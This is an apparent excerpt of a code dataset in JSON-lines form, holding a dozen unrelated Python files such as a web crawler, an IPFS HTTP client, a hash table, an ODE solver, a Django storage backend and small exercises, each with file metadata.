    @staticmethod\n    def get_and_save_page(url, path):\n        try:\n            response = ZhihuCommon.get_session().get(url, headers = ZhihuCommon.my_header, verify = False)\n            with codecs.open(path, 'w', response.encoding) as fp:\n                fp.write(response.text)\n                return\n        except Exception as e:\n            print(\"fail to get \" + url + \" error info: \" + str(e))\n            return\n\ndef main():\n    z = ZhihuCrawler()\n    z.init_xsrf()\n    login_success = z.login()\n    if not login_success:\n        print(\"fail to login.\")\n        return\n    z.do_crawler()\n\n    print(\"ok\\n\")\n\nif __name__ == \"__main__\":\n    main()\n\n\n","sub_path":"crawler_user.py","file_name":"crawler_user.py","file_ext":"py","file_size_in_byte":11841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"575245313","text":"\"\"\"\nHTTP client for api requests. This is pluggable into the IPFS Api client and\ncan/will eventually be supplemented with an asynchronous version.\n\"\"\"\nimport requests\nimport contextlib\n\nfrom . import encoding\n\n\n\nclass HTTPClient(object):\n\n    def __init__(self, host, port, base, default_enc):\n        self.host = host\n        self.port = port\n        self.base = 'http://%s:%s/%s' % (host, port, base)\n\n        self.default_enc = encoding.get_encoding(default_enc)\n        self._session = None\n\n\n    def request(self, path,\n                args=[], opts={}, files=[],\n                decoder=None, post_hook=None,\n                **kwargs):\n        \n        url = self.base + path\n        \n        params = []\n        params.append(('stream-channels', 'true'))\n        for opt in opts.items():\n            params.append(opt)\n        for arg in args:\n            params.append(('arg', arg))\n\n        method = 'post' if (files or 'data' in kwargs) else 'get'\n        \n        if self._session:\n            res = self._session.request(method, url,\n                                        params=params, files=files, **kwargs)\n        else:\n            res = requests.request(method, url,\n                                   params=params, files=files, **kwargs)\n\n        if not decoder:\n            try:\n                ret = self.default_enc.parse(res.text)\n            except:\n                ret = res.text\n        else:\n            enc = encoding.get_encoding(decoder)\n            try:\n                ret = enc.parse(res.text)\n            except:\n                ret = res.text\n        \n        if post_hook:\n            return post_hook(ret)\n        return ret\n\n\n    @contextlib.contextmanager\n    def session(self):\n        self._session = requests.session()\n        yield\n        self._session.close()\n        self._session = None\n","sub_path":"ipfsApi/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"398736136","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 5 11:04:17 2019\n\n@author: jonahcullen\n\"\"\"\n\nimport argparse\nimport os\n\n\ndef make_arg_parser():\n    parser = argparse.ArgumentParser(\n        prog=\"GeneratePBS.py\",\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n    parser.add_argument(\n        \"-d\", \"--data\",\n        default=argparse.SUPPRESS,\n        metavar=\"\",\n        required=True,\n        help=\"Path to dir containing the pbs submission scripts files [required]\")\n    return parser\n\n\nif __name__ == '__main__':\n    \n    parser = make_arg_parser()\n    args = parser.parse_args()\n\n    data = os.path.abspath(args.data)\n\n    pbs = os.path.join(os.getcwd(), \"submit_pbs_scripts.sh\")\n\n    with open(pbs, \"w\") as f:\n        for file_name in os.listdir(data):\n            if file_name.endswith(\".pbs\"):\n                print(f\"qsub {data}/\", file_name, file = f, sep = \"\")\n","sub_path":"RANDOM_REQUESTS/Ted_K/python_scripts/Generate_pbs_submission_shell_script.py","file_name":"Generate_pbs_submission_shell_script.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"471915070","text":"\"\"\"\nSeparate Chaining Hash Table based functions, timings and statistics\n\n@author Mark Diedericks 30572738\n@since 21/10/2019\n@modified 
21/10/2019\n\"\"\"\n\nimport bst\nfrom task1 import HashTable as HashTableLinear\nfrom task3 import load_dictionary_statistics\n\nclass BinarySearchTree(bst.BinarySearchTree):\n def insert(self, key, value):\n \"\"\"\n Will attempt to insert at a value with a given key\n\n @param key: The key to search for and get it's value\n @return The depth at which the key-value pair was inserted\n @complexity O(log n) for both best and worst case, where n is the depth of the binary search tree\n @postcondition The binary search tree will contain the given key-value par\n \"\"\"\n if self.root is None:\n self.root = bst.BinaryTreeNode(key, value)\n return 0 # It was the root node, so depth of 0\n\n depth = 0 # Start at root, so depth of 0\n current_node = self.root\n while True:\n if key < current_node.key:\n depth += 1 # Increment depth at where the insert is\n if current_node.left is None:\n current_node.left = bst.BinaryTreeNode(key, value)\n break\n else:\n current_node = current_node.left\n elif key > current_node.key:\n depth += 1 # Increment depth at where the insert is\n if current_node.right is None:\n current_node.right = bst.BinaryTreeNode(key, value)\n break\n else:\n current_node = current_node.right\n else:\n assert current_node.key == key\n current_node.item = value\n break\n\n # Return set/insertion depth\n return depth\n\nclass HashTable(HashTableLinear): \n ### Override only the methods which directly implement linear probing ###\n ### Implement separate chaining instead. ###\n \n def __getitem__(self, key):\n \"\"\"\n Will attempt to get the value associoated with the given key\n\n @param key: The key to search for and get it's value\n @return The value of associated with the given key\n @raises KeyError: key does not exist in the hash table\n @complexity O(log n) for both best and worst case, where n is the length of the binary search tree,\n @precondition The parameter key is of type string\n @postcondition The value for the key will be returned if the key exists within the hash table\n \"\"\"\n \n # assert preconditions\n assert isinstance(key, str)\n\n # Get starting index and table size\n i = self.hash(key)\n\n # If slot is not empty, attempt to find key\n # BinarySearchTree will raise KeyError if not found.\n if self.table[i] is not None:\n assert isinstance(self.table[i], BinarySearchTree)\n return self.table[i][key]\n\n # Key wasn't found\n raise KeyError('Key does not exist in table.')\n\n def __setitem__(self, key, item):\n \"\"\"\n Will set value of existing key-value pair, insert new key-value pair if not existent within dictionary. 
\n        With separate chaining the table never fills, so no rehash is performed on insertion.\n\n        @param key: The key of the key-value pair, hashed to find the index\n        @param item: The value associated with the key\n        @return None\n        @complexity O(log n) for both best and worst case, where n is the length of the binary search tree,\n        @precondition The parameter key is of type string\n        @postcondition The hash table will contain the item for the given key\n        \"\"\"\n        \n        # assert preconditions\n        assert isinstance(key, str)\n\n        # Get starting index and table size\n        i = self.hash(key)\n\n        # If a pair is where this is meant to be, we have a collision\n        # If that pair has the same key we are setting, not inserting\n        # thus it cannot count as a collision.\n        if self.table[i] is not None:\n            self.collisions += 1\n        else:\n            self.table[i] = BinarySearchTree()\n        \n        assert isinstance(self.table[i], BinarySearchTree)\n\n        # Insert/set and get probe length stat\n        depth = self.table[i].insert(key, item)\n        self.count += 1\n\n        # We're adding a new pair, so consider probe length\n        self.probe_len += depth\n        if depth > self.probe_max:\n            self.probe_max = depth\n\n    def __contains__(self, key):\n        \"\"\"\n        Determines whether or not the hash table contains a specified key\n\n        @param key: the key to search for\n        @return Whether or not the key exists within the hash table\n        @complexity O(1) for best case - no BST. O(log n) for worst case, where n is the length of the binary search tree,\n        @precondition The parameter key is of type string\n        \"\"\"\n        \n        # assert preconditions\n        assert isinstance(key, str)\n\n        # Get starting index and table size\n        i = self.hash(key)\n        if self.table[i] is not None:\n            assert isinstance(self.table[i], BinarySearchTree)\n            return key in self.table[i]\n\n        # Key wasn't found\n        return False\n\n\ndef table_load_dictionary_statistics(max_time):\n    \"\"\"\n    Will execute load_dictionary_time on a combination of files, sizes and bases. Saving the data, along with timing and words\n    to a file. Uses a separate chaining hash table.\n    \n    @param max_time: how long load_dictionary operates before timing out; if None the function won't time out\n    @return None\n    @complexity O(nm) for both best and worst case. 
Where n is cost of load_dictionary and m is the number of size-base-file combinations\n @postcondition A file, 'output_task5.csv', will contain the filename, table, base, words, collisions, probe length, max probe length \n and rehash count time data for each combination.\n \"\"\"\n\n TABLE_BASE = [1, 27183, 250726]\n TABLE_SIZE = [250727, 402221, 1000081]\n FILE_NAMES = [\"english_small.txt\", \"english_large.txt\", \"french.txt\"]\n\n # Get output file handle\n f = open(\"output_task5.csv\", 'w+', encoding=\"UTF-8\")\n\n # Create headers\n f.write('File Name,Table Size,Table Base,Words,Time,Collisions,Probe Total,Probe Max, Rehashes\\n')\n\n # Loop through each combination\n for file in FILE_NAMES:\n for size in TABLE_SIZE:\n for base in TABLE_BASE:\n # Run combination with quadratic probing hash table\n res = load_dictionary_statistics(base, size, file, max_time, HashTable(size, base))\n\n words = res[0]\n time = res[1] if res[1] is not None else \"TIMEOUT\"\n col = res[2]\n pro = res[3]\n promax = res[4]\n rehashes = res[5]\n\n # Print results to file\n f.write('{0},{1},{2},{3},{4},{5},{6},{7},{8}\\n'.format(file, size, base, words, time, col, pro, promax, rehashes))\n print('{0},{1},{2},{3},{4},{5},{6},{7},{8}'.format(file, size, base, words, time, col, pro, promax, rehashes))\n\n # Close file\n f.close()\n\n # Ensure file is closed\n if not f.closed:\n raise IOError('File is not closed.')\n\n\nif __name__ == '__main__':\n table_load_dictionary_statistics(120)\n\n","sub_path":"Interview Prac 3/task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":7529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"238801809","text":"\n\nfrom xai.brain.wordbase.nouns._llama import _LLAMA\n\n#calss header\nclass _LLAMAS(_LLAMA, ):\n\tdef __init__(self,): \n\t\t_LLAMA.__init__(self)\n\t\tself.name = \"LLAMAS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"llama\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_llamas.py","file_name":"_llamas.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"308490753","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 31 14:37:11 2016\nModule which computes a the 2D spatial power spectrum of a given image. Used for VCA analysis. \n@author: npingel\n\"\"\"\n\n#imports\nimport numpy as np\nfrom astropy.io import fits\nfrom scipy.optimize import curve_fit\nimport matplotlib.pyplot as pyplot\nimport matplotlib\n\nmatplotlib.rc('font', family='sans-serif')\nmatplotlib.rc('font', serif='Helvetica Neue')\nmatplotlib.rc('text', usetex='false')\nmatplotlib.rcParams.update({'font.size': 14})\n\n\n##method to compute relevent gridding paramters and coordinates; returns pixel boundaries in modulus image for lower,\n##upper, and corresponding physical scale taken as the mid-point between the lower and upper boundaries\n##numPaddedPix is the number of pixels along one axis in padded image\n##angRes is the angular resolution of single pixel in original image (arcmin)\n##origAngExt is the original angular extent of the integrated image\ndef scale(numPaddedPix,angRes,origAngExt): \n distance = 300. 
##pc\n totAngularCoverage = numPaddedPix*angRes/60.\n maxPhysScale = 2*distance*np.tan(np.deg2rad(totAngularCoverage/2.))\n modRes = (distance)/maxPhysScale ## pixel resolution of modulus image\n maxSpatialFreq = (numPaddedPix/2.)*modRes \n ##pixel radius of annuli boundaries \n lowerRadius = []\n midRadius = []\n upperRadius = [] \n minSpatialFreq = distance/(2*distance*np.tan(np.deg2rad(origAngExt/2.)))\n logInc = (np.log(maxSpatialFreq)-np.log(minSpatialFreq))/18. \n initLower = np.log(minSpatialFreq)\n for i in range(0,18):\n lowerRadius.append(initLower+(i*logInc))\n midRadius.append(lowerRadius[i]+logInc/2.)\n upperRadius.append(lowerRadius[i]+logInc)\n ##corresponding physical extent taken as midpoint between annuli\n midRadiusArr=np.array(midRadius,dtype='float32')\n lowerRadiusArr = np.array(lowerRadius, dtype='float32')\n upperRadiusArr = np.array(upperRadius, dtype='float32') \n spatialScale = distance/np.exp(midRadiusArr)\n return np.exp(lowerRadiusArr)/modRes,np.exp(upperRadiusArr)/modRes, spatialScale\n\n##function for fitting\ndef linFunc(x,slope,b):\n return x*slope+b\n \ndef gaussFunc(x,a,mu,sig):\n return a*np.exp(-(x-mu)**2/(2*sig**2))\n\ndef computePS(intImage,angResolution,numPadPix,origAngExt):\n intImage_Scaled = intImage[:,:]#/1.82e18\n where_are_NaNs = np.isnan(intImage_Scaled)\n intImage_Scaled[where_are_NaNs] = 0.\n plotPS = True\n print('Creating Modulus Image...')\n modulusImage = np.abs(np.fft.fftshift(np.fft.fft2(intImage_Scaled,[int(numPadPix),int(numPadPix)])))**2\n\n lowerRadius, upperRadius, spatialScale = scale(numPadPix,angResolution,origAngExt)\n\n ##arrays to hold results\n medianList = []\n errList = []\n for ring in range(0,18):\n print('Computing median value within annulus: '+np.str(ring+1)) \n colDenDist = []\n for i in range(0,int(numPadPix)):\n for j in range(0,int(numPadPix)):\n radius = np.sqrt((i-(numPadPix/2-1))**2+(j-(numPadPix/2-1))**2)\n if lowerRadius[ring] <= radius <= upperRadius[ring]:\n colDenDist.append(modulusImage[i,j])\n colDenDistArr = np.array(colDenDist, dtype='float32')\n medianList.append(np.median(colDenDistArr)) \n errList.append(np.median(np.abs(colDenDistArr-medianList[ring])))\n\n\n print('Fitting spectra...')\n errArr = np.array(errList, dtype='float32')\n medianArr = np.array(medianList, dtype='float32')\n errArr_Log = errArr/(medianArr*np.log(10))\n spatialScaleLog = np.log10(spatialScale)\n\n coeffs,matcov = curve_fit(linFunc,spatialScaleLog,np.log10(medianList),[1,1],sigma=errArr_Log)\n\n fitList = []\n for i in range(0,18):\n fitList.append(coeffs[0]*spatialScaleLog[i]+coeffs[1])\n error = np.sqrt(np.diag(matcov))\n print('Slope: '+np.str(coeffs[0]))\n print('Error: '+np.str(error[0]))\n if plotPS == False:\n pyplot.errorbar(spatialScale,np.log10(medianArr),yerr=errArr_Log, fmt='o')\n pyplot.plot(spatialScale,fitList, color='black', linewidth=2,label=r'${}^{13}$CO Slope: $-$%.2f' % coeffs[0]+'+/$-$'+'%.2f' % error[0])\n pyplot.xlim(100,0.5)\n pyplot.xscale('log')\n pyplot.ylabel(r'Log$_{10}$(Power)')\n pyplot.xlabel(r'Linear Scale [pc]')\n pyplot.legend(loc=0, fontsize=14)\n #pyplot.savefig('/Users/npingel/Desktop/Perseus_intPS_13CO_MADErrors', bbox_inches='tight')\n pyplot.show()\n pyplot.clf()\n return coeffs[0], error[0]\n \n\n\n","sub_path":"VCA/SPSModule.py","file_name":"SPSModule.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"277299855","text":"import webvtt\nimport sys\n\nif len(sys.argv) < 4:\n 
print(\"need file names\")\n sys.exit(1)\n\ndef rreplace(s, old, new):\n li = s.rsplit(old, 1)\n return new.join(li)\n\ndef convert_file(file_name, main_lang, sub_lang):\n file_name_sub = rreplace(file_name, main_lang, sub_lang)\n #print(file_name + '\\n' + file_name_sub)\n #return\n vtt_main = webvtt.read(file_name)\n vtt_sub = webvtt.read(file_name_sub)\n\n # while loop all korean time captions\n index_main = 0\n index_sub = 0\n while index_main < len(vtt_main):\n while index_sub < len(vtt_sub):\n caption_main = vtt_main[index_main]\n caption_sub = vtt_sub[index_sub]\n\n if (caption_main.start <= caption_sub.start):\n #print(\"##### \" + caption_main.text.replace(\"‎\",\"\").replace(\"\\n\",\"\\n##### \"))\n print(\"

\" + caption_main.text.replace(\"‎\",\"\") + \"

\")\n break\n else:\n print(\"

\" + caption_sub.text.replace(\"‎\", \"\") + \"

\")\n print(\"\")\n index_sub += 1\n index_main += 1\n\n # finish final z index\n while index_sub < len(vtt_sub):\n print(caption_sub.text)\n index_sub += 1\n\n #print('end of ' + file_name)\n\n# main\nprint(\"\")\nlang_main = sys.argv[1]\nlang_sub = sys.argv[2]\nfor i in range(3, len(sys.argv)):\n print('Episode' + str(i - 2) + '')\n print('

======================')\n print('

Episode ' + str(i - 2))\n print('

======================')\n print('')\n convert_file(sys.argv[i], lang_main, lang_sub)\n\nprint(\"\")\n","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"205647782","text":"from math import exp\n\ndef f1(x: float, u1: float, u2: float):\n value = -500.005 * u1 + 499.995 * u2\n return value\n\ndef f2(x: float, u1: float, u2: float):\n value = 499.995 * u1 - 500.005 * u2\n return value\n\ndef f1_true(x: float):\n value = 10 * exp(-0.01 * x) - 3 * exp(-1000 * x)\n return value\n\ndef f2_true(x: float):\n value = 10 * exp(-0.01 * x) + 3 * exp(-1000 * x)\n return value\n\ndef calculate_true(x: float):\n return f1_true(x), f2_true(x)\n\ndef rk2euler(x_curr: float, v1_curr: float, v2_curr: float, h: float):\n x_euler = x_curr + h\n v1_euler = v1_curr + h * f1(x_curr, v1_curr, v2_curr)\n v2_euler = v2_curr + h * f2(x_curr, v1_curr, v2_curr)\n\n x_next = x_euler\n v1_next = v1_curr + 0.5 * h * (f1(x_curr, v1_curr, v2_curr) + f1(x_euler, v1_euler, v2_euler))\n v2_next = v2_curr + 0.5 * h * (f2(x_curr, v1_curr, v2_curr) + f2(x_euler, v1_euler, v2_euler))\n return x_next, v1_next, v2_next\n\ndef print_header():\n print(\"|Итерация |Время |Численное решение |Точное решение |Глобальная погрешность |\")\n print(\"|---------|----------|---------------------------------------------------|---------------------------------------------------|---------------------------------------------------|\")\n print(\"|{0:9}|{1:10.5}|{2:25}|{3:25}|{4:25}|{5:25}|{6:25}|{7:25}|\".format(\"n\", \"Xn\", \"V1\", \"V2\", \"U1\", \"U2\", \"E1\", \"E2\"))\n\ndef print_string(iter: int, x: float, v1: float, v2: float, u1: float, u2: float, e1: float, e2: float):\n print(\"|{0:9}|{1:10.5}|{2:25}|{3:25}|{4:25}|{5:25}|{6:25}|{7:25}|\".format(iter, x, v1, v2, u1, u2, e1, e2))\n\ndef print_table(x_list: list, v1_list: list, v2_list: list, u1_list: list, u2_list: list):\n print_header()\n number_iters = len(x_list)\n if number_iters < 150:\n for i in range(number_iters):\n print_string(i, x_list[i], v1_list[i], v2_list[i], u1_list[i], u2_list[i], u1_list[i] - v1_list[i], u2_list[i] - v2_list[i])\n else:\n for i in range(101):\n print_string(i, x_list[i], v1_list[i], v2_list[i], u1_list[i], u2_list[i], u1_list[i] - v1_list[i], u2_list[i] - v2_list[i])\n for i in range(30, 0, -1):\n print_string(number_iters - i, x_list[-i], v1_list[-i], v2_list[-i], u1_list[-i], u2_list[-i], u1_list[-i] - v1_list[-i], u2_list[-i] - v2_list[-i])\n\ndef calculate(x_start: float, v1_start: float, v2_start: float, h_start: float, epsilon: float):\n x_list = [x_start]\n v1_list = [v1_start]\n v2_list = [v2_start]\n u1_list = [v1_start]\n u2_list = [v2_start]\n\n x_curr, v1_curr, v2_curr, h = x_start, v1_start, v2_start, h_start\n for i in range(1, number_iter + 1):\n if right_break <= x_curr:\n break\n while(True):\n x_next, v1_next, v2_next = rk2euler(x_curr, v1_curr, v2_curr, h)\n x05, v1_05, v2_05 = rk2euler(x_curr, v1_curr, v2_curr, h / 2)\n _, v12, v22 = rk2euler(x05, v1_05, v2_05, h / 2)\n e = max(abs(v1_next - v12), abs(v2_next - v22)) / 3\n if epsilon < e:\n h /= 2\n continue\n if epsilon / 3 <= e <= epsilon:\n break\n if e < epsilon / 3:\n h *= 2\n break\n u1, u2 = calculate_true(x_next)\n x_curr, v1_curr, v2_curr = x_next, v1_next, v2_next\n x_list.append(x_curr)\n v1_list.append(v1_curr)\n v2_list.append(v2_curr)\n u1_list.append(u1)\n u2_list.append(u2)\n return x_list, v1_list, v2_list, u1_list, 
u2_list\n\nnumber_iter = 250000\nright_break = 500\nx_start, v1_start, v2_start = 0.0, 7.0, 13.0\nh_start = 0.01\nepsilon = 0.0000001\n\ndef main():\n print_table(*calculate(x_start, v1_start, v2_start, h_start, epsilon))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"hard_system/hard_system.py","file_name":"hard_system.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"640647774","text":"\"\"\"\nFrites\n======\n\nFramework of Information Theory for Electrophysiological data and Statistics\n\"\"\"\nimport logging\n\nfrom frites import (io, core, conn, stats, utils, workflow, simulations, # noqa\n estimator)\n\n__version__ = \"0.3.8\"\n\n# -----------------------------------------------------------------------------\n# Set 'info' as the default logging level\nlogger = logging.getLogger('frites')\nio.set_log_level('info')\n\n# -----------------------------------------------------------------------------\n# get / set config\n\n\ndef get_config():\n \"\"\"Get the global configuration of frites.\"\"\"\n from frites.config import CONFIG\n return CONFIG\n\n\ndef set_config(key, value, verbose=None):\n \"\"\"Change the global config of frites.\n\n Parameters\n ----------\n key : string\n Entry of the config\n value : dict / list\n The new value for the selected key. The type should be the same as the\n default one\n \"\"\"\n io.set_log_level(verbose)\n assert isinstance(key, str)\n CONFIG = get_config() # noqa\n assert key in CONFIG.keys(), f\"The key {key} doesn't exist.\"\n CONFIG[key] = value\n logger.info(f\"The key {key} has been updated\")\n","sub_path":"frites/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"358997534","text":"import os\r\nfrom ASP_Classes import *\r\n\r\n\r\ndef line2class(character):\r\n switcher = {\r\n '*': 0,\r\n 'G': 1,\r\n 'T': 2,\r\n 'LT': 3,\r\n 'Vb': 4,\r\n 'Sb': 5,\r\n }\r\n return switcher.get(character,0)\r\n\r\ndef initCircuit(lineSplit):\r\n global circ1\r\n\r\n if lineSplit[0][0] == 'G': # init new generator\r\n tempGen = Generator(lineSplit)\r\n circ1.generators.append(tempGen)\r\n elif lineSplit[0][0] == 'T':\r\n tempTrans = Transformer(lineSplit)\r\n circ1.transformers.append(tempTrans)\r\n elif lineSplit[0][0] == 'L':\r\n if lineSplit[0][1] == 'T':\r\n tempLine = TransmissionLine(lineSplit)\r\n circ1.transmissionLines.append(tempLine)\r\n elif lineSplit[0][0] == 'C':\r\n pass\r\n\r\ndef main():\r\n global circ1\r\n\r\n with open(\"Circ1.txt\") as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n lineSplit = line.split(\" \")\r\n initCircuit(lineSplit)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n circ1 = Circuit(\"Circ1.txt\")\r\n main()\r\n\r\n\r\n","sub_path":"ASP_simulator/ASP.py","file_name":"ASP.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"585208748","text":"from database_files import models\nfrom database_files.module_settings import DBF_SETTINGS\nfrom django.core.files.storage import Storage\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nimport os\n\nclass DatabaseStorage(Storage):\n\n\tdef __init__(self, encrypt=DBF_SETTINGS[\"DATABASE_FILES_ENCRYPTION\"], compress=DBF_SETTINGS[\"DATABASE_FILES_COMPRESSION\"], *args, **kwargs):\n\t\tself.encrypt = 
encrypt\n\t\tself.compress = compress\n\t\tsuper(DatabaseStorage, self).__init__(*args, **kwargs)\n\n\tdef _open(self, name, mode='rb'):\n\t\ttry:\n\t\t\tf = models.DatabaseFile.objects.get(filepath=name)\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn None\n\t\treturn f.retreive()\n\n\tdef _save(self, name, content):\n\t\tnewname = name\n\t\tnewpath, newfilename = os.path.split(name)\n\t\tnewfilenamestem, newfilenameext = os.path.splitext(newfilename)\n\t\tpostpend = 0\n\t\twhile self.exists(newname):\n\t\t\tpostpend += 1\n\t\t\tnewname = newpath + newfilenamestem + \"-\" + unicode(postpend) + newfilenameext\n\t\tf = models.DatabaseFile.objects.create(\n\t\t\t\tfilepath=newname,\n\t\t\t\t)\n\t\tf.store(content,\n\t\t\t\tencrypt=self.encrypt,\n\t\t\t\tcompress=self.compress,\n\t\t\t\t)\n\t\treturn newname\n\n\tdef exists(self, name):\n\t\treturn models.DatabaseFile.objects.filter(filepath=name).exists()\n\n\tdef delete(self, name):\n\t\ttry:\n\t\t\tmodels.DatabaseFile.objects.get(filepath=name).delete()\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\tpass\n\n\tdef url(self, name):\n\t\ttry:\n\t\t\tfile = models.DatabaseFile.objects.get(filepath=name)\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn None\n\t\treturn reverse('database_file', kwargs={'file_id': file.pk})\n\n\tdef size(self, name):\n\t\ttry:\n\t\t\treturn models.DatabaseFile.objects.get(filepath=name).size\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn 0\n\n\tdef modified_time(self, name):\n\t\ttry:\n\t\t\treturn models.DatabaseFile.objects.get(filepath=name).modified_time\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn None\n\n\tdef accessed_time(self, name):\n\t\ttry:\n\t\t\treturn models.DatabaseFile.objects.get(filepath=name).accessed_time\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn None\n\n\tdef created_time(self, name):\n\t\ttry:\n\t\t\treturn models.DatabaseFile.objects.get(filepath=name).created_time\n\t\texcept models.DatabaseFile.DoesNotExist:\n\t\t\treturn None\n","sub_path":"database_files/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"32957213","text":"from custom.math import (triangle_number as tri, square_number as squ,\n pentagonal_number as pen, hexagonal_number as hex,\n heptagonal_number as hep, octagonal_number as oct)\n\ndef poly_n(n):\n return (3, tri(n)), (4, squ(n)), (5, pen(n)), (6, hex(n)), (7, hep(n)), (8, oct(n))\n\n\ndef next(types, value):\n if len(types) == 6 and value[0] // 100 == value[-1] % 100: # First two 0 == last two 6\n print(value, sum(value))\n else:\n for t, n in dic.get((types[-1], value[-1]), []):\n if t not in types:\n next(types+[t], value+[n])\n\npolys = []\nstart = 19 # 19 oct is first > 999 so start here\nend = 141 # 141 tri is first > 9999 so cut off here\n\nfor n in range(start, end):\n for type, value in poly_n(n):\n if 1000 <= value <= 9999 and value % 100 > 9:\n polys.append((type, value))\n\ndic = {}\n\nfor type_1, value_1 in polys:\n for type_2, value_2 in polys:\n if type_1 != type_2 and value_1 % 100 == value_2 // 100:\n dic[type_1, value_1] = dic.get((type_1, value_1), []) + [(type_2, value_2)]\n\nfor type, value in dic:\n next([type], [value])\n","sub_path":"Problems 051 - 100/Problem 061.py","file_name":"Problem 061.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} 
+{"seq_id":"78440091","text":"import bs4\n\nindex = open('index.html')\nindexSoup = bs4.BeautifulSoup(index, \"html.parser\")\n\ndef displayMatches(selected):\n    \"\"\"Displays the text of selected elements\"\"\"\n    for ix, el in enumerate(selected):\n        print(\"\\t\" + str(ix+1) + \".) \" + el.getText())\n    print(\"\")\n\nprint(\"Title:\", indexSoup.select('title')[0].getText())\n\npars = indexSoup.select('p')\nprint(\"Paragraphs:\")\ndisplayMatches(pars)\n    \nlinks = indexSoup.select('a')\nprint(\"Links:\")\ndisplayMatches(links)\n\nbigtext = indexSoup.select('.bigtext')\nprint(\"With class 'bigtext':\")\ndisplayMatches(bigtext)\n\nscraem = indexSoup.select('#scraem')\nprint(\"With ID 'scraem':\")\ndisplayMatches(scraem)\n    ","sub_path":"043-beautiful-soup/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"546860083","text":"import clr\nclr.AddReference('System.Drawing')\nclr.AddReference('System.Windows.Forms')\n\nfrom System.Drawing import *\nfrom System.Windows.Forms import *\n\nclass MyForm(Form):\n    def __init__(self):\n        # Create child controls and initialize form\n\n        #hello btn\n        self.btn = Button()\n        self.btn.Text = 'Hello'\n        self.btn.AutoSize = True\n        self.btn.Location = Point(5,5)\n        self.btn.Click += self.btn_Click\n        #hello label\n        self.lbl = Label()\n        self.lbl.Text = \"this is a word\"\n        self.lbl.Location = Point(50,5)\n        \n        \n        # add Controls \n        self.Controls.Add(self.btn)\n        self.Controls.Add(self.lbl)\n    #define event \n    def btn_Click(self,sender,e):\n        MessageBox.Show(\"hello\")\n        \n\nApplication.EnableVisualStyles()\nApplication.SetCompatibleTextRenderingDefault(False)\n\nform = MyForm()\nApplication.Run(form)\n\n","sub_path":"Python/Project/WindowsApplication1/WindowsApplication1/WindowsApplication1.py","file_name":"WindowsApplication1.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"623984660","text":"linha = list()\ncoluna = list()\nmatriz = list()\npares = 0\nsoma = 0\n\n#row loop\nfor poslin in range(0, 3):\n    for poscol in range(0, 3):\n        valor = int(input(f'Digite um valor para [{poslin}, {poscol}]: '))\n        coluna.insert(poscol, valor)\n    \n    \n    linha.insert(poslin, coluna[:])\n    coluna.clear()\n    \nmatriz = linha[:]\n\nprint('=-'*30)\nfor linmat in matriz:\n    for colmat in linmat:\n        print(f'[{colmat:^5}]',end='')\n\n        #sum of the even values\n        if colmat % 2 == 0:\n            pares += colmat\n    \n    print('')\nprint('=-'*30)\n\n\n\nprint(f'A soma dos valores pares é {pares}')\n\nfor c in range(0,3):\n    soma += matriz[c][2]\nprint(f'A soma dos valores da terceira coluna é {soma}')\n\n\nprint(f'O maior valor da segunda linha é {max(matriz[1])}')\n","sub_path":"ex087maissobrematriz.py","file_name":"ex087maissobrematriz.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
